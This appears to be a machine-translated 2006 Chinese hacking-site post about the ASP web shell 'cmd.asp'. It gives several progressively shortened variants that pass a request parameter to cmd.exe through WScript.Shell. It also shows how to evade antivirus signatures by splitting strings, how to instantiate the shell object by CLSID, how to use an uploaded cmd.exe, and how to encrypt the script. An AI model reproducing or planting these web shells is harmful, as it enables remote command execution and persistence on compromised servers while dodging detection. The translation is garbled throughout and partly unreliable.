cmd. asp some deformation-vulnerability warning-the black bar safety net

2006-01-15T00:00:00
ID MYHACK58:6220066384
Type myhack58
Reporter 佚名
Modified 2006-01-15T00:00:00

Description

Here's the asp back door does not mean like those word Trojan, chop off, the ice Fox and the like b/s type, only refers to as cmd. asp or 2005a. asp. First, take a look zzzeva free fso cmd. asp The code is as follows:<form method="post"> <input type=text name="cmd" size=6 0> <input type=submit value="run"></form> <textarea readonly cols=8 0 rows=2 0> <%response. write the server. createobject("wscript. shell"). exec("cmd.exe /c "&request. form("cmd")). stdout. readall%> </textarea> Isn't that a little long? In the injection time to write a bit of a bad write. That to change it. Second, the change zzzeva free fso cmd. asp The code is as follows:

<textarea readonly cols=8 0 rows=2 0> <%response. write the server. createobject("wscript. shell"). exec("cmd.exe /c "&request("cmd")). stdout. readall%>

Usage is xx. asp? cmd=net user This is in order to get the result row was easy, in fact, if not for aesthetics, but also can be shorter, that to the third Third, the shortening of the cmd. asp

<%response. write the server. createobject("wscript. shell"). exec("cmd.exe /c "&request("cmd")). stdout. readall%>

Here with a response. write variables with a cmd. Why not shorter? A fourth, shorter cmd. asp

<%=server. createobject("wscript. shell"). exec("cmd.exe /c "&request("c")). stdout. readall%>

It seems like this is the most short. In addition to the short, we also want to be in another place of work. Fifth, the wscript. shell be renamed? Code:

<ObjEct runat=sErvEr iD=kk scOpE=pagE classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8"></ObjEct> <%=kk. exec("cmd /c "+request("cmd")). stdout. readall%>

Of course, the classid value in different systems under different. This you want to make changes

Sixth, is some of the kill asp Trojan software detected? The variable open. Code:

<%=server. createobject("ws"+"cript. shell"). exec("cmd.exe /c "&request("c")). stdout. readall%>

Or

<%=server. createobject("ws"&"cript. shell"). exec("cmd.exe /c "&request("c")). stdout. readall%>

Here is the code the quotation marks in the East can be just removed, as can also be split into

<%=server. createobject("ws"&"cript. shell"). exec("c"&"md.exe /c "&request("c")). stdout. readall%>

No. 7,cmd. exe not make the call? 这个 你 自己 上传 一 个 cmd.exe put in a call to the directory, code changes are as follows:

<%=server. createobject("wscript. shell"). exec("e:\aspx\cmD.EXE /c "&request("c")). stdout. readall%> The first 8 months,the asp code can encrypt? Of course you can. Tools: 98MeXP/CN/sce10chs.exe">http://download.microsoft.com/ download/winscript56/Install/1.0/WIN98MeXP/CN/sce10chs.exe